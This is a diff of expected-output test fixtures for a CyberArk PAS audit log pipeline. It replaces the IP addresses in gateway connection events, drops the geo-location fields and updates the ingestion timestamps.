@@ -597,9 +549,9 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-11T17:48:22Z", - "gateway_station": "81.32.170.205", + "gateway_station": "67.43.156.13", "station": "10.0.2.2", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:48:22\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:48:22Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e19\u003c/MessageID\u003e\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\n \u003cSourceUser\u003ePSMPGW_VAGRANT\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:48:22\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:48:22Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n 
\u003cMessageID\u003e19\u003c/MessageID\u003e\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\n \u003cSourceUser\u003ePSMPGW_VAGRANT\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Full Gateway Connection", "source_user": "PSMPGW_VAGRANT", "message": "Full Gateway Connection", 
@@ -613,8 +565,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:29.025139500Z", - "original": "\u003c5\u003e1 2021-03-11T17:48:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:48:22\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:48:22Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e19\u003c/MessageID\u003e\\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPGW_VAGRANT\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:48:22\",\"IsoTimestamp\":\"2021-03-11T17:48:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway 
Connection\",\"SourceUser\":\"PSMPGW_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.2.2\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"81.32.170.205\"}}}", + "ingested": "2021-12-09T13:36:39.546316700Z", + "original": "\u003c5\u003e1 2021-03-11T17:48:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:48:22\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:48:22Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e19\u003c/MessageID\u003e\\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPGW_VAGRANT\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
09:48:22\",\"IsoTimestamp\":\"2021-03-11T17:48:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PSMPGW_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.2.2\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"67.43.156.13\"}}}", "code": "19", "kind": "event", "action": "full gateway connection", @@ -644,22 +596,11 @@ "ip": "10.0.1.20" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "35.192.121.42", "user": { "name": "PVWAGWUser" }, - "ip": "35.192.121.42" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" @@ -683,7 +624,7 @@ "Administrator" ], "ip": [ - "35.192.121.42", + "67.43.156.14", "10.0.1.20" ] }, 
@@ -693,8 +634,8 @@ "rfc5424": true, "iso_timestamp": "2021-03-11T18:02:57Z", "gateway_station": "10.0.1.20", - "station": "35.192.121.42", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 10:02:57\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T18:02:57Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e19\u003c/MessageID\u003e\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\n \u003cSourceUser\u003ePVWAGWUser\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e35.192.121.42\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.14", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 10:02:57\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T18:02:57Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e19\u003c/MessageID\u003e\n 
\u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\n \u003cSourceUser\u003ePVWAGWUser\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.14\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Full Gateway Connection", "source_user": "PVWAGWUser", "message": "Full Gateway Connection", 
@@ -708,8 +649,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:29.025143600Z", - "original": "\u003c5\u003e1 2021-03-11T18:02:57Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 10:02:57\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T18:02:57Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e19\u003c/MessageID\u003e\\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\\n \u003cSourceUser\u003ePVWAGWUser\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e35.192.121.42\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 10:02:57\",\"IsoTimestamp\":\"2021-03-11T18:02:57Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway 
Connection\",\"SourceUser\":\"PVWAGWUser\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"10.0.1.20\"}}}", + "ingested": "2021-12-09T13:36:39.546322Z", + "original": "\u003c5\u003e1 2021-03-11T18:02:57Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 10:02:57\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T18:02:57Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e19\u003c/MessageID\u003e\\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\\n \u003cSourceUser\u003ePVWAGWUser\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.14\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
10:02:57\",\"IsoTimestamp\":\"2021-03-11T18:02:57Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PVWAGWUser\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "19", "kind": "event", "action": "full gateway connection", @@ -732,39 +673,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.71.250.247", "user": { "name": "Administrator" }, - "ip": "34.71.250.247" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "PSMPGW_SSH" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -788,8 +708,8 @@ "Administrator" ], "ip": [ - "81.32.170.205", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { 
@@ -797,9 +717,9 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-14T13:49:35Z", - "gateway_station": "34.71.250.247", - "station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:49:35\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:49:35Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e19\u003c/MessageID\u003e\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\n \u003cSourceUser\u003ePSMPGW_SSH\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\n \u003cGatewayStation\u003e34.71.250.247\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "gateway_station": "67.43.156.15", + "station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:49:35\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:49:35Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n 
\u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e19\u003c/MessageID\u003e\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\n \u003cSourceUser\u003ePSMPGW_SSH\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Full Gateway Connection", "source_user": "PSMPGW_SSH", "message": "Full Gateway Connection", 
@@ -813,8 +733,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:29.025147600Z", - "original": "\u003c5\u003e1 2021-03-14T13:49:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:35\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:35Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e19\u003c/MessageID\u003e\\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPGW_SSH\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\\n \u003cGatewayStation\u003e34.71.250.247\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:35\",\"IsoTimestamp\":\"2021-03-14T13:49:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway 
Connection\",\"SourceUser\":\"PSMPGW_SSH\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"34.71.250.247\"}}}", + "ingested": "2021-12-09T13:36:39.546327300Z", + "original": "\u003c5\u003e1 2021-03-14T13:49:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:35\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:35Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e19\u003c/MessageID\u003e\\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPGW_SSH\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 
06:49:35\",\"IsoTimestamp\":\"2021-03-14T13:49:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PSMPGW_SSH\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"67.43.156.15\"}}}", "code": "19", "kind": "event", "action": "full gateway connection", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-20-partial-gateway-connection.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-20-partial-gateway-connection.log-expected.json index 1847a535269..ed45fb133ef 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-20-partial-gateway-connection.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-20-partial-gateway-connection.log-expected.json 
@@ -49,7 +49,7 @@ "event": { "severity": 2, "action": "partial gateway connection", - "ingested": "2021-06-09T10:24:29.253603900Z", + "ingested": "2021-12-09T13:36:40.675511Z", "original": "\u003c5\u003e1 2021-03-25T09:20:07Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 05:20:07\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T09:20:07Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e20\u003c/MessageID\u003e\\n \u003cDesc\u003ePartial Gateway Connection\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n 